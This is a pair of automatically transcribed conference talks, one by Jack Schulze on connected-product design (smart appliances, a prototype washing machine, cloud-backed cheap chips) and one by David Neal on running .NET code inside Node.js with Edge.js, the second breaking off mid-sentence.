PlayStation brand and there's this thing called Walkman. So you're easily the coolest thing on the street. It's portable music. You own all of it. Panasonic, who? Nothing. Just forget it. There's nothing out there. You actually define the data formats for media storage and then license to other companies and everyone just chooses to do it. Plus, you've got Sony music and the states that you own legally like half the music library probably own everything Madonna has ever like written and Britney Spears and Michael Jackson. So within like what? Three years, some tiny little pissant beige computer manufacturer on the West Coast has just ironed your brand off the map. Just doesn't exist anymore. I mean, they must be pushing their fingernails through their hands. It's incalculable how stupid that was to let that go. I'm a designer, but speaking to business nerds, they all kind of look away when you talk about Sony Walkman. That was a bad one. And it's extraordinary how poorly they just understand consumer behaviors and habits. And when they say to you something, the wall they want back from you and they don't really want it, you know, you get that little postcard for the warranty? That's their equivalent to an Apple ID. That's their Gmail address as far as they're concerned. That's all they want to know. And they'll see you later going by the cassettes from the store, you know. And so it's just grossly broken. This is what this is recently. If you go to Sony.com, this is what you get. Do you want to be marketed to in American or Norwegian? That's the question that you've been presented when you go to Sony.com. Why don't you go to Google.com? You get one of the most powerful tools in living memory. Or if you go to Apple.com, you get sold an iPad and they do that well. So it's like a phenomenally weak way of actually understanding consumers. There's just no way that manufacturers are going to be the people that own the logic of this space or occupy it in our public imaginations in terms of how connected products will work. Because the reality of a connected product is really just an extension of a piece of software. It happens to be manufactured by someone who isn't Apple or Amazon in that instance. Maybe you manufacture it. Maybe someone else manufactures. But the reality is it's software that reaches a place that was hard to do before. Yeah, he mentions it again. I won't click through this as no sound. So just to take back to industrial design of where the value of this kind of stuff is, probably in the short term in terms of how connected products in domestic environments can advance. Once there was this company in Britain called Singer and it made sewing machines. They're very important. This thing has a treadle on it. You'd do that with it and it turns the spindle and that makes the sewing machine go. At some point, a smart person went, hey, electricity and motors. That's handy. You don't have to do that in there. You don't have to do the treadle anymore. This must have been quite serious undertaking for a company that basically made cast iron mechanical stuff to turn into a company that injection molded a piece of what's really a piece of consumer electronics. They did. So in a way, I think what we're looking for are the kind of few humble steps that mean that connected products are marginally more useful than their unconnected ancestors. So here's Whirlpool, another big consumer electronics brand. Deals with this kind of space. And we just have a brief look at what they're doing in this environment at the moment. So this is for Whirlpool. Introducing Whirlpool smart appliances. You know smart means something like this is going on, right? Some computer business beyond just the embedded software in a chip that means the water gets hot and cold. With Sixth Sense Live TM technology. Better get that trademark in, don't want anyone stealing Sixth Sense Live. You know, it's like this is what they're saying. And these are two of the products in the list. And these are things you can buy them. You can really go to the store and buy this. I haven't got one of these. I haven't spent a lot of time playing with them. But let's just speculate on a minute on the dishwasher here. The three unique selling points of this product with its Sixth Sense Live technology are remote control lock. Try and imagine this. You've got your dishwasher out. You've slotted it in. The plumbers come in. Put it in there. There's a hole in your kitchen. You've got it in there. It costs you some $400 more than exactly the same dishwasher that doesn't have Sixth Sense Live technology in it. You've got it in there. Now you've got to get it on your Wi-Fi. I mean you've got a Samsung TV with a whole screen and a remote control with 600 buttons and it's hard to get on the Wi-Fi. Here you've got a dishwasher with like six buttons. Can you imagine trying to put in like a wet key with like seven keys and no screen? Who knows how that magic works? But it's somehow, maybe it's Bluetooth and there's some magical kind of pairing thing. Let's just assume it's Bluetooth and you just go near it and it kind of knows now that that's the phone it's slaved to or something like that. And they thought about that. And you get it in there. And this is so you can launch an app which you then have to find on the app store. So you go to the app store, find the app, download this model Sixth Sense Live technology. It comes down so that you can go to open the door with your phone. When do you want to open the door of your dishwasher when you're not at your dishwasher? I mean it's completely ludicrous. Imagine the money given what we've just seen about manufacture is miserable business, cost a fortune, billions of dollars, six on container ships for months before you even get to charge for the product. And all you're doing with it is opening the door with your phone. It's just ridiculous, just profoundly ridiculous. And of course we thought we could do better because we know it all. So we made our own washing machine which we literally built called CloudWatch. And it's a prototype. We're not manufacturing washing machines. No, yeah, that's going to be someone else's pain. But we basically did a few things where we took an existing washing machine, electrolytes washing machine, turns out and we kind of hacked it. So the first thing we wanted to understand is how washing machines really work from a manufacturer's point of view. So we added some of our own connectivity in there and we realized that, yeah, lo and behold, we can control it. So if you press the start button at the bottom there, helpful video person, the light goes on in the background. And so we also thought about how the machine might change in order to accommodate the network. What sort of things do you need on a machine in order to talk meaningfully to the person using it about what's happening, what are the new functions and new activities you can have associated with it that help it to be more useful than washing machines were before. Because I don't see that many people complaining about washing machines. I mean, we're not sitting here in dirty clothes. So they can't work that badly. So one of the things that we realized was no one uses the 17 different presets on the first wheel. So we just made a little ink display where you can change the presets to the three things you mostly use and label them properly. Then you can see when the wash is going to finish. For those people who do washing, that's a big deal because you don't want your clothes sitting in stagnant damp, closed washing machine growing mold. And you can turn the notifications on and off. The thing we stumbled over though that was perhaps most profound are the last two buttons on it, which is that when you run out of liquid, you're at the machine. That's when you know you've run out of washing liquid or detergent. And we configured this machine so when you press the detergent button, it orders you one from Amazon. Or it adds it to your Eucado list. And this is the thing that's caught the attention of we put this on the internet and many people kind of looked at it and wrote blogs about it and things like that. And come back to the button in a minute. This is John Lewis in London. That's the John Lewis washing machine. John Lewis are a retailer. They're just a big nice posh department store. This is John Lewis washing machine. Really this is an Electrolux washing machine. It's actually a Zanussi washing machine which is in the Electrolux brand. We're talking about so in Electrolux, every single washing machine that doesn't have a screen has the same printed circuit board in it. You know like the LEDs behind the buttons, they're in the same places for every single Zanussi, AEG, la la la, Electrolux washing machine. That is on the market. The dial is in the same place proportionally. If you were to measure them on every single different brand, they would all be in the same place because the circuit board is literally identical. So all John Lewis have done is they've just asked Zanussi to supply them with a special machine and they've changed the fascia. They've just changed the plastic on the front, stuck the John Lewis brand on it and now they're saying it's their machine. And this is the way that OEMs and manufacturing works. It's all a big lazy system of deals and shipping and stuff like that. But what's interesting about it is that they charge 50lb more for this machine than they do for the equivalent Zanussi model which is literally the same engine. It's the same circuit board. It's just got different plastic. If you open up a washing machine, there's a circuit board. There's a circuit board at the front which is called the control board and there's another circuit board at the back. Sorry, there's a control at the front which is called the interface board and the control board that sits at the back. Interface board does the buttons and dials and the program stuff and the control board at the back is the bit that makes sure your house doesn't go on fire or flood and all the motors get controlled and the tachyometer is reporting properly and that's the bit that does the heavy lifting. So it's relatively easy to intervene in that board. That is, this is the board that's in every single low end electro lux washing machine on every brand. That board is called the EWM2200. It stands for electro lux washing machine 2200. There isn't this massive diversity of electronics. It's extremely simple what's going on here. And that chip right in the middle there is relatively straightforward microcontroller. It's not running Linux, it's not doing anything scary. The Raspberry Pi looks like God to it. It's a really, really novel tiny little thing. There's nothing on here that's that expensive. It's just happening. This is where we come back to the bottom. If you speak to manufacturers like Samsung or electro lux or companies that make kitchen goods or houseware goods, they have a metric about these machines, which is the value of the FMCG that goes through them. One of the reasons why the fridge is so significant to a company like Samsung is that you put 3,000 pounds through it every year compared to only 400 pounds through your washing machine. So that's why they're interested in the fridge because the value of the services associated with that product are much, much higher than other products in the kitchen. Your toaster just makes bread. That's cheaper chips. So they're not as interested in it in terms of the service. This is this entire area of supermarkets, right? Everything you see on these shelves only exists because of machines. Like of course there were detergents before, but dishwasher tablets, these little gels, all of that kind of stuff, the whole kind of fog and universe of those things. They're only about servicing those machines. So really, you buy a washing machine. It consumes power and electricity and water. We know that. But also it consumes conditioner, little tablets, these scalars. These are vast, squilly and dollar industries. Those companies are rich, right? Proctor and Gamble aren't going home hungry. There are a lot of money in Unilever getting you to buy weird little liquid tabs with like three compartments and a little yellow gel and the blue gel and a kind of little yin-yang shape on it, all of that kind of stuff. And so if you think about it, here's an espresso machine. Espresso don't manufacture those machines. Krups and Magimix manufacture them. They sell you these coffee pods. Those coffee pods are about 37 pence. Think about how much coffee is in a tiny aluminium packet. We're talking about this unimaginable luxury markup. It makes Apple look bad. We're talking about like sort of seven, maybe 8,000% markup on that coffee compared to what you get when you buy like beans or ground. Even Starbucks are like, whoa, that's good. You know, you go to Starbucks and you buy a coffee by two pence worth of coffee for £3.90. That's why there's so many coffee shops. It's biblically profitable. There's literally nothing like it. So if you've got an espresso don't make those machines. They design them. They own all the patents on it. Just give it away to someone else to make it and they want to get it into your house as cheaply as possible because what they want to do is sell you 37 pence capsules. If you've got a washing machine on it and the washing machine has got a buy now button for the goods that were £400, £500, £3,000 a year inside it, then Unilever might as well give you a washing machine with the button to their goods on it. If you press that button, you're buying their personal. You're never going to go to the shop and buy another one. You just go, ha, buy now. It's like you're doing your iPhone. People buy apps twice because they forgot their password. It's just easier. It's just that kind of stuff. So for me, some of the connectivity value in the disruption in the way the businesses work are that the services and systems and economics of those machines may get radically disruptive. It's not Electrolux or Sony that are going to do that. It's retailers. It's Amazon. Yeah, Amazon have Wisponet, which is the component, which is the relationship and technology in the Kindle, which allows you to download books when you're on holiday. If you go on holiday and you're walking on a bus and you think, oh, I want to get the new Dan Brown or new Harry Potter 20, you know, you off you go, you do that. The publisher pays for the data transfer and it has come magically through the air, right? Through some weird deal making with all the 3G companies in the world, Vodafone and Sprint in the US and whoever it is. And it just works. You're a consumer. You don't have to pay a bill. It's being dealt with in the background. So if Amazon took that technology and flipped it open so that anyone could put essentially a Wisponet component in their consumer devices, then you'd end up with something quite radical. What if they just supplied that chip? It's not hard. That chip's been around for a decade. I mean, it used to be powerful. It's probably powerful enough to run cruise missiles, but you know, most things are these days. It's just not hard to get powerful chips, especially if all you've got to do is turn a drum and a few motors and sensors. So for a very, very small adjustment to the bill of materials of this device, it becomes a unique purchasing point for FMCG companies. Last point, I'm going to be quick, only eight and a half minutes. This is one that you're going to know more about than I do. So please forgive me for just continuing to belittle you with simple and ridiculous truisms that you probably wrote all the software for in actuality. But I think this is one of the most brilliant things that's ever happened. And I think a few people realized that when you go onto Google and you kind of go, ah, pizza, or Angelina Jolie's got really nice cheekbones, whatever you've written, right? And it kind of goes out and you go, no, not that one. You go Penguin and it goes, ah, Penguin. You're not that Penguin, Batman Penguin, you know, all that kind of stuff. And you just kind of ask it things. And look at this, 213 million results in a quarter of a second. I mean, you know more than I do, right? But like that for me is like comparable to like the fucking moon landing or something in terms of like engineering effort. How do you get that to happen? You know, it's really amazing. It's at any moment and anyone can do it right now sort of for free. And I think there's something happening around cloud computing, which, you know, you won't need to hear from me, which is this idea that you can get almost infinite computing power associated with very, very modest computers. So this in the bottom right of right of right corner here, this is a company called ARM that you will know about. And they have a prototyping system called embed, which is without the E. So it's just letter M, B, D, if you know what I mean. And it's a bit like their kind of Raspberry Pi Arduino sort of thing. It's a prototyping of kind of hardware. This is the cheapest board they do that can meaningfully handle audio. It costs about five pounds for the whole of development boards. So let's just say the chips are pound. Very, very low, simple costs, you know, down in the gutter compared to iPhones and TV set top boxes and stuff like that. And there you've got the cloud. So that's just, let's just say that's all of Google, right? What that means is essentially you can speak into that chip literally just with your voice and say pizza and it can read out to you like the actual answers, 213 million results. The challenge is only to make it perceivable to the person using it. But what's interesting is that historically you needed big computers to do big tasks and now you don't. There's something about objects like this, simple, cheap junk that you bought in the supermarket that's actually able to take advantage of the kind of computing power you just can't put in a room unless you're Amazon and Google. Just big scary server farms. And we've done some projects recently that kind of take advantage of that and it's very weird. You've got this tiny little idea of a processor with like a little bit of UI on it and it's doing all of Google at you. It's very, very powerful. It feels extraordinary. Yeah. All right, I'm going to skip this one. I'm afraid of... Oh, no, I'm all right. I've got five minutes. There's a project we did with Google. So we work with big technology companies mostly in the US like Google and Intel, et cetera, et cetera, thinking about new forms in UI, new kinds of things that can do with their systems and we did a project called LAMPs. Now, basically, the weird thing about Google is they're so extraordinarily rich. I've never come across anything like it in terms of how loose they are with their money. They just kind of go, we like you guys, what do you want to do? We're like, well, normally with clients, you do what you're told, so why don't you tell us what to do? And they're like, no, they just do what you want to do. And I've heard they did this kind of book scanning thing where they're like, yeah, we're just going to put all the books in the whole of history and make it part of the internet so we can scan it and do more AdWords. And we're like, okay, and how do you do that? And they're like, well, we just built a big giant system of robots and interns and basically we just read all the books with a computer. And these machines are incredible, right? So they've got these scanners that get books. And because books aren't really 2D, they're like, they've got bow in them and flex. They have like a lidar, like a connect, a laser scanner that shoots at the book, that scans the 3D surface of the book on that page. And then it takes 16 photos at every focal plane across that depth. And then it takes the 3D data and all 16 photos and chooses which part of the photo that's in focus given the actual depth of the book at that point and restitches together a magical 3D version of the book where all bits of it in focus and then uses that as the source of the optical character recognition it uses to generate the text in the book. You're like, what? And then some poor intern goes, you know, turns a page, click, does it again. That's amazing. I can imagine if you had that as like a domestic product. Imagine if you just made that part of your desk. Imagine if on your work desk, you had this thing that can scan anything, read anything, and maybe project back out. So we did a project where we got a bunch of like connectees, laser scanners, high definition cameras and projectors and started trying to read, analyze and project back out what it was seeing on the desk so that the things in the world sort of become magically computational. We made a short film. So we made these blocks, which is really a game about where the computing happens. This is real projection. There's no, this isn't doing any real computer vision. It's just real projection in one of the early video prototypes. We did do real stuff, but we were also doing this kind of fake stuff. This is just a wooden block with some springs in it. But when you use it and you play with it, there's no electronics in it, no signals being sent to the computer. When you press those buttons, the computer just sees that you're pressing the button, changes what is projecting on it and starts playing music. So this weird dumb block, this just dumb, completely analog lump of wood suddenly becomes like it's computational, even though the computing is happening in a server somewhere or on a computer locally or in this weird lamp that we've got set up. Anyway, it's a very interesting project. But just again, this is that reinforced point about when you free yourself from the idea that computing cycles are rare and you say you can have as many as you want, then the objects in the world start to change quite radically. We make everything. He has to make everything he is thinking about in order to express it. It's from a film called Close Encounters of Third Kind and poor old Henry Jafis gets obsessed with an alien landing and starts continually building this mountain. If you get the reference, it makes sense because you're a sci-fi nerd. If you don't, apologies, it's a bit weird. Why do any of this is a really good question? And this is usually something I say to designers because as software people and developers, you're already doing it. But one of the things I like that, this is from a blog post on the O'Reilly radar. O'Reilly, a big technical publisher, no doubt you know them, and Jobs says, we believe that it's technology married with the humanities that yields us the results that make our hearts sing. And the post writer, Doug Hill, says that basically he was saying that Apple products have soul and that people are attracted to those products because they can feel that soul both consciously and unconsciously. And there's just something nice. When software is doing something really good, when it's beautiful, that it's just like the most extraordinary stuff that's ever happened. And that's why I continue to work in it and why I think most people should because configuring your Samsung Wi-Fi is miserable and it doesn't have to be. Thanks. Paper in a box. There's a green bit of paper or a red bit of paper or a yellow bit of paper depending on how stupid you think I've been. And you put them in a little plastic box and that tells the organizers how bad it was as an idea to bring me here.
Jack Schulze will unpack the emerging design domain of connected products and design for the technology landscape. Using examples from bergs work and from industry Jack will shed light on the core challenge of representing systems through interfaces in the emerging world of connected devices and share principles from berg's design process. He will discuss the friction between manufacture and software and the power of thought leadership through good communications and prototyping. Finally Jack will focus in on two great opportunities in the connected product space. Firstly, outlining the the real power of the cloud and cheap chips can out strip the most powerful smartphones. Secondly, looking at which new kinds of functionality are the most disruptive to business and how this can be used to design new and exciting products.
10.5446/50540 (DOI)
If technology will cooperate. So my name is David Neal. You can find me on the Twitter at reverendgeek. I blog at a few places and you can trust me because I consume a lot of bacon and caffeine. And in case you haven't, you know, hadn't figured out by now, I'm from America, America. And I come from a very special part of America called the South or the Southern part. So I speak fluent redneck. So I hope you can understand. Hope you can understand my English. I work for a company called Lean Kit. We make project management software for a con bond and I'm a developer advocate. I work on our APIs and integrations with other tools like Microsoft TFS and Project Server, Oracle Primavera, Jira, and GitHub. So what we're talking about is why no.js and.NET. What makes sense? We're going to look at edge.js and some demos and some tips that I've learned from working with the tool and we'll wrap up by talking about some alternative strategies for using node and.NET together. So what's up with no.js? Anybody here actively developing on node? A few of you? Awesome. So in case you've been under a rock, it's node.js has just exploded over the last few years and has just made a lot of press, gotten a lot of attention, and has certainly been something that I have noticed and wanted to explore for a long time. But for me, coming from a.NET background, there was always some kind of barrier or some kind of showstopper for me in the.NET world that I live in that kept me from really adopting and using node.js a lot. So I got to play around with it some. I pick it up every now and again. But until edge.js came out, I really couldn't find a compelling reason to continue working on it. So what's so great about node.js? Well, first of all, it's JavaScript. It's JavaScript on the server. And for like it or not, for better or worse, JavaScript has become, you know, one of the most important languages in the world. You know, it drives the Internet, the Internet of Things, platforms, all kinds of tools and databases, other services are now centered around JavaScript. You can use JavaScript as our language. It's here to stay. Node.js is built on Chrome V8. And so it harnesses the Chrome V8 JavaScript engine to run. And along with that, I'm sorry, I've got this little window popped up here, it's built from the ground up because of JavaScript to run on this asynchronous event loop. So it is single threaded, but because it's designed from the ground up to be, you know, the paradigm is asynchronous programming, there's some crazy awesome things it can do around concurrency and data manipulation streaming. It's, you know, it's one of the first platforms to have Web sockets and all kinds of newer Web technologies. And so there's a great scalability story there, there's a great concurrency story. So there's a lot of compelling reasons to look at Node. And then the community itself that has just exploded around Node.js, it's been embraced by people from all different platforms. And you know, it's, you have the ability to focus on one language, JavaScript from top to bottom. So from the back end, from databases to the server to the front end. And it allows you to, you know, stay, focus on that one language and be extremely efficient across all tiers. Once I checked, there was over 73,000 packages, Node modules. So these are community contributed. So the community itself is, you know, kind of like the app store, you know, any, just about anything you want to do with Node, there's probably a dozen modules or packages that are available to accomplish that task. So there's tons of resources. Web frameworks, REST APIs, testing, templating, socket libraries, NoSQL database, message, messaging, just about anything you can think of. And even Microsoft has taken notice. So since 2010, Microsoft has been engaged. And you know, one of the first steps that they made was they had this guy, Thomas Janshuk, who later has written as JS. He was the guy instrumental in porting, you know, ensuring that Node.js would run on Windows. Node.js originally did not run on Windows. And of course, now Node.js is a first class citizen in Azure. JavaScript is an important language for Microsoft. There, you know, with WinRT and so forth, you got JavaScript in Windows 8 that you can program with. So it hasn't escaped the eye of Microsoft as well. So other reasons, there's a great article on NearForm called Why Node.js is becoming the go-to technology in the enterprise. And so there's lots of case studies available. So some of the feedback from this article as well as personal feedback I've gotten from my coworkers and from other folks that have gone to Node.js is rapid innovation delivery, developer happiness, attract and retain talent, performance. There's a lot of compelling reasons. One of those case studies being PayPal, they had two teams working in parallel. One who is brand new to Node, they haven't, you know, and their other team working in Java. And this was their experience. They built the same solution on both platforms. In Node, they built almost twice as fast with fewer people, wrote it in 33 percent, fewer lines of code and so forth. Decreased response time and increased request per second. And this is a quote from this case study, like many others, we slipped Node.js in the door as a prototyping platform and like many others, we proved extremely proficient. We decided to give it a go in production. So it's like, you know, once you try it, it's like you got to do some more. So what are some use cases for Node? Basically it's perfect for anything web. Single page apps, real time. The things that we kind of expect from modern web applications that we've come to expect because of like Facebook being, you know, near real time or near real time. It uses web sockets. You can build REST APIs. The ubiquitous Hello World app for Node.js is a chat client. It makes it, you know, trivial to connect multiple clients together over sockets and be able to communicate and pass messages and so forth. There are, there's a great case study with Walmart. They've taken the approach, a migration strategy of going from the Java that they currently use to Node and they're using like a proxy service. They've got Node sitting in the middle that's exposing all their APIs. Some of them are native Node and some of them get passed on to their legacy systems but they're having great, you know, extremely great success in adopting Node. So why.NET? Well.NET has a great legacy as well. There are over 23,000 NuGet packages last time I checked. SQL Server is not a bad relational database. I come from a, you know, pretty much a predominantly Microsoft shop. My whole career has been on Microsoft platform and so this was, this was like one of the deal breakers for me for a long time is Node.js really didn't have a great SQL Server driver. So you couldn't use, you couldn't access SQL Server and so, you know, kind of like if you're on Microsoft stack, it's like SQL Server is immediately assumed. It's like what application are we going to build on top of SQL Server? You know, it's not a question. So Microsoft Office, integrating with Office and doing, you know, generating documents or processing documents, that's important. Windows Azure, they have a lot of REST APIs exposed but to do, to build applications and services and things on Azure, it's, you know, still all the tooling and everything that's available is, you know,.NET is still the best direction to go there. And you know, a lot of Microsoft infrastructure, Exchange, SharePoint and also hardware, you know, device drivers, Win32 drivers. I know from experience like in manufacturing that there are lots of hardware, you know, components, hardware devices that, you know, Win32 is really the only option for managing those devices. So what is EdgeJS? Like I already mentioned, Thomas Janshuk who worked on the port of Node.js or support for Node.js on IIS, he's got a lot of, you know, internal knowledge of how Node works and was able to get. So he developed this module for Node that allows Node to run.NET in process. So it's not a cross-process call or shelling out to Node application separately..NET is loaded up and is in, run in the same process. And so there's very low latency. It's not just C-sharp as you would assume. It also supports F-sharp, calling ADO.NET directly, Python and PowerShell. And you can also execute.NET code either inline. So inside your JavaScript file, you can have.NET code in the same file or you can have separate files like a.cs file or.csx or you can reference other assemblies. And the, so up until today, up until now, the story for adding new features onto Node for developing new modules and so forth, you had two choices. One is either write it in JavaScript and if you can't, couldn't do it in JavaScript, you have to write a module in C. And so EdgeJS now gives us the capability of, you know, to write into new features into Node or new modules and not have to go to C for that. So warning benchmark ahead. I don't know if you're like me or not, but I'm kind of leery anytime I see benchmarks from people. So I've seen some benchmarks with EdgeJS, but I needed to know for myself. So I went and I did basically the same kind of benchmarks comparisons that are available on Edge's website. So what you see here on the first is a call to a JavaScript function. And so that's native function to function call. The latency of that call is somewhere around.005 milliseconds. Here in the middle is EdgeJS to a C sharp function or C sharp assembly. It's actually inline code is what I tested. And so it's a little bit worse. It's nine times slower than a native function call. But this last one here, that is a service stack web service, service stack before the lead being the fastest web service, you know, service that you can build on.NET. And you can see that the latency, this is a web service running locally. So we're not even taking into consideration network latency in the process. So if you've got something, you know, some code in.NET that you want to execute, you might think, well, I'll just create a web service on top of it. And that's the kind of performance penalty that you're hitting. And so similarly, if you write an external application and you shell out and, you know, execute that application out of process, you're going to see similar latency issues. So this is what Edge was designed to solve, is this performance and latency issue. Installing Edge is very, very easy. You'll need Node.js 0.6 or later. You'll need.NET Framework 4.5 or Mono 3.4. The reason these versions are important is that these support the async and await. So because Node is single threaded and completely asynchronous, you need to have that async support inside.NET to also, you know, resolve being able to run on that same thread so it doesn't block and cause problems for Node. Open up a command prompt or terminal within your OS. Change to your project folder and type MPM install edge. MPM being a package manager for Node, if you're not already familiar, makes it really trivial to pull down packages. Now up until, I guess, a month ago, two months ago, Windows was required for Edge. And it's just now become supported on Mac OS X and Linux. So what does the Edge.js app look like? This is a JavaScript file. You might imagine this being helloworld.js. The first line is a require edge. So coming from a.NET world, this is kind of like your using statement. This is how you pull reference a module or a reference an external library. So we're saying we're referencing Edge. And then next, we're declaring a function called helloworld. And the definition of that function is edge.funk. And then everything that's in that string is C-sharp code. It's an anonymous function with the async keyword out in front letting the compiler know that this should run asynchronously. And we're just taking the input that was sent to us and returning it as a string. So then we call that function after we declare it. And I'm passing in I love bacon because that's obvious. And then in typical Node.js fashion, you have a callback function. That callback function expects two parameters, an error and a result. We're checking to see if there was an error there. And then we just console log the result. This is a typical pattern in Node.js where this is how we do the asynchronous work. We invoke a function and instead of expecting an immediate result, we're saying when you're done, call this function. So opening up a command prompt or terminal window and typing in node helloworld.js. This is how you run a Node.js application. It just simply spits out I love bacon. So let's take a look at some demos. I've got basically that same code that I showed you on the screen. In this case, it's a little bit longer because I've wrapped this in a comment. So this is how we express C sharp. If you're doing inline code, you put it in a JavaScript comment block. That's so JavaScript or Node doesn't blow up when it sees C sharp code. So that's kind of ugly. But it gets the job done. That's one way you can do Node. The next example we'll do hello file gives us the same output. But this now is referencing a file demo.cs. And this file demo.cs is basically the same thing. But now you can see we could separate our JavaScript code from our C sharp code. We can put some tests around that. We could have a better development experience. We're separating those concerns. Just I want to show a common question is, well, how does data get marshalled from Node to.NET? And what are the data types? And how does that look? So the output from this is data from Node.js to.NET. We've got an integer, a number, and a string. We can see that all these get passed into the types that we would probably expect in.NET. We have 32, double string, Boolean. An object gets converted to an expando object for dynamic. An array gets translated into an array of objects. And vice versa, when we pass data from.NET back to Node, it gets, you know, Node, of course, JavaScript being somewhat typeless and dynamic. It just translates those appropriately into numbers and strings and Booleans and objects and arrays as well. And this code looks like this is on the JavaScript side. This is the data I'm going to send to our.NET function. And I've got an integer and a number and a string, an object, an array, so forth. And I'm referencing a.CS file, data marshalling, and then I'm calling that function, passing in data to send to.NET. And this is a lot of code to look at. Everybody, is the font size okay? All right. So basically, I'm just iterating over the, looping over the data that gets this passed in. The thing to point out here is that the input that comes from Node into.NET is an iDictionary of string and object. So this is the signature that edge.js expects you to implement when creating a function that's going to interact with edge.js. So it needs to be async and it needs to, the input will be an iDictionary of string and object. And then when I'm casting on this line here, I'm casting my values, or wait a minute, this is where I'm casting. So I'm saying data, cast to a iDictionary of string and object. And then I'm looping through that and I'm printing out, I'm writing out the results. And then when I'm done, I'm creating a new anonymous object and I'm passing, I'm returning that so that Node then turns around after it receives its result and writes the result out to the screen. Again, so iDictionary string object is what's expected. So for folks that already have an existing code base of.NET that they want to leverage in Node. The pattern that you probably want to implement is some type of proxy class that's going to wrap calls into your existing code. You have a question? All right. Next example. Hello SQL. So I have a VM running Windows 8, a SQL server 2012, I think. And I'm calling into.NET to go and fetch some data out of that SQL server for me. And then I'm just writing out that to the screen. What this looks like, basically the same thing. I'm referencing a file, I have a page that I want to request. So I'll say current page equals to go back and run this and I get a different set of users as I would expect. The data itself is pretty straightforward. I've got this same signature, public async task, it returns a task of object and I'm passing in. I don't have to cast. So the signature can be an iDictionary string object. And then I'm defining my query, which is a, I'm using a common table expression to do paging in SQL. And I'm calling, creating a query task, factory.start new and I'm executing, I'm passing off that query and the input parameters down to this code down here. So a couple of things to point out with what's going on here. One is, a.do.net does have support for async and await. So you can have, there's an asynchronous command open, asynchronous execute reader, there's all these async commands. Unfortunately, the mono version of the a.do.net driver doesn't support all that stuff. And so I'm kind of having to just execute all that onto a, using the task parallel library, using the task runner. And so this gets executed in the CLR thread pool. That may mean that the code is actually executed on the same thread or.net may decide to spin up another thread to execute this code. And either way, it's non-blocking and it's not going to cause a problem with Node. So the other thing I wanted to point out is this connection string that I'm getting for SQL server is coming from an environment variable. So in the world of Node and other, you know, these other platforms, there's not such a thing as like an app config or a web.config that we're used to in.NET. So you have to set environment variables. Like if you're going to host a Node.js application in Azure, when you go to set up that instance, there's a, as part of the configuration, there's a section that has environment variables, v-value pairs that you can just arbitrarily put in whatever is required for your application. And so there's an ADO or edge SQL module that will do, that pretty much wraps all this for you. So you can do inline SQL from edge and it expects an environment variable named edge underscore SQL underscore connection underscore string. All the rest of the stuff is.NET code going out and fetching those using a reader and writing those results out. And then last, I have an example here of calling an assembly. It's doing pretty much the same thing that I just showed you that was in that external file. In this case, it's returning an object that has, you know, how many records did it return, what are the total number of records, and then an array of those objects. And the code looks like this. So this is how you reference an assembly from edge.js. When you're declaring the function, you pass in an object that includes the path to the assembly file. So I've got a file sitting out here called edgeDemos.dll. The type name, so this would be like the name of the class that you're going to, you're referencing, and then the method name. So I have a method named query users on a class named edgeDemos.dapperTests. And then I'm passing in the same page data, current page, and page size, and then we're writing that out to the console. Now, the code for this is I've got this in Xamarin. Xamarin Studio, of course, is the way to do.NET development on Mac, and it works really, really well. If you haven't checked this out before, it's pretty awesome. So I have this, again, I'm getting a connection string for my environment variable, and I have this public async task query users, and I'm returning a page query. In this case, I'm using dapper, which is a great micro-or-m. It runs fine on Mono, and I can do some pretty interesting things with dapper, including dapper just is a dynamic micro-or-m that just runs off the SQL connection. So I can, it creates extension methods on your connection object. So you create a connection, and you can do things like.query,.query multiple, lots of really cool things. So the code, you know, your code with SQL Server becomes really small and tight. All right. So, what else can you do with Edge? Well, just kind of think about some of the other things, because we now have access to.NET from Node, some things that you can do with Edge that you can't do from Node immediately. Of course, Windows Event Log, doing things with performance counters, accessing the registry on local machine for whatever reason you may have, doing things like printing, again, like accessing hardware, whereas today you would have to shell out to some kind of external program from Node to do that. You could invoke that directly from your Node app, maybe 3D printing, I don't know. Accessing other hardware like the camera, the microphone, or other devices that are on the computer. Doing things like video encoding and image processing and other CPU bound work. So Node being single threaded, it works awesome for, you know, web requests and for serving up data and for processing or sending down files or doing socket-based operations, but it's not ideal for doing real CPU intensive operations. Normally you would have a C module that Node would invoke to do that work, but now, you know, in this case, you can write those kind of CPU intensive operations in.NET. Another interesting possibility is PowerShell, you know, being able to have Node.js exposing some API on your network and being able to kick off other operations or do other automated things in Node. Another thing that's not readily available in Node is doing security-related, like generating certificates or doing encryption. It's not really designed well suited for that. Recommendations. I would prefer to, you know, as much as possible if you're going to go with S.J.S. to separate your code, your.NET code into external class libraries versus inline codes, at least separating in the files or, you know, the development experience would be a whole lot better if you're using, like, Visual Studio for doing your.NET work and, you know, having tests around your S.J.S. Edge code. Anytime you're using Edge.js, I would wrap that in a separate module so the way Node works, it makes it very easy to separate your code into other modules. It's kind of like separating into other class files. And the reason I recommend this is that maybe you're approaching Edge as a, it's like a migration strategy. And you're wanting to move toward a Node.js application, but you need Edge.js to give you that, you know, that stop gap or, you know, as a bridge to get you to Node eventually. So by wrapping in separate modules, you can easily swap those out for native JavaScript modules at a later time. I would recommend that you benchmark and test thoroughly. My experience with Edge.js so far has been great, but, you know, you just never know. It's like it depends on your particular situation. You may have some legacy code that you need to invoke from Node. You know, who knows what kind of threading or blocking issues may come up. You know, you just really need to test and make sure that the performance and scalability and, you know, your memory footprint and all that kind of thing, all those kind of things are still in line. It is possible with Edge.js to go from.NET into Node, so from a.NET application, you could invoke Node and be able to run stuff in Node and still be in the same process and have the benefits of that being a very low latency thing. Personally, I can't think of a good use case for using Node in that kind of situation. Maybe there is. So, my preference is just, you know, the one way Node.js to.NET, but there could be other scenarios. Always remember to async, of course, it's, you know, it's a big no-no to block that single event loop in Node. And if you're on Visual Studio, you may or may not be aware that there is a beta Node.js tools for Visual Studio out on the Visual Studio gallery. It's actually very impressive. You can create Node.js projects inside Visual Studio. You can set break points. You've got all the same kinds of, you know, you can step through your JavaScript code just like you would in C-sharp. And it's a great experience. I highly recommend you check that out if you haven't looked at Node yet. So, if you can write it in Node.js, obviously, that's the best choice. You're going to get the lowest latency. You're going to get a better, you know, your maintenance over time is going to be much, much easier. Going back to that performance chart that I showed earlier, well, maybe a web service is perfectly acceptable. Maybe the latency, maybe it's a once in a while type of operation that you need to invoke.NET for. Maybe it's, you know, every now and again I need to, you know, trigger something that's going to go out and generate a report. In that case, maybe a web service is perfectly fine for your situation. You don't need to go with SJS. You can still have, you know, some folks that are developing in.NET that are exposing these web services and folks that are developing in Node. Another great strategy is a message-based architecture. I could talk about this for a long time, but there are a lot of benefits to this other than just, you know, in this particular scenario. But a message-based architecture would be having something like a message bus like service bus or 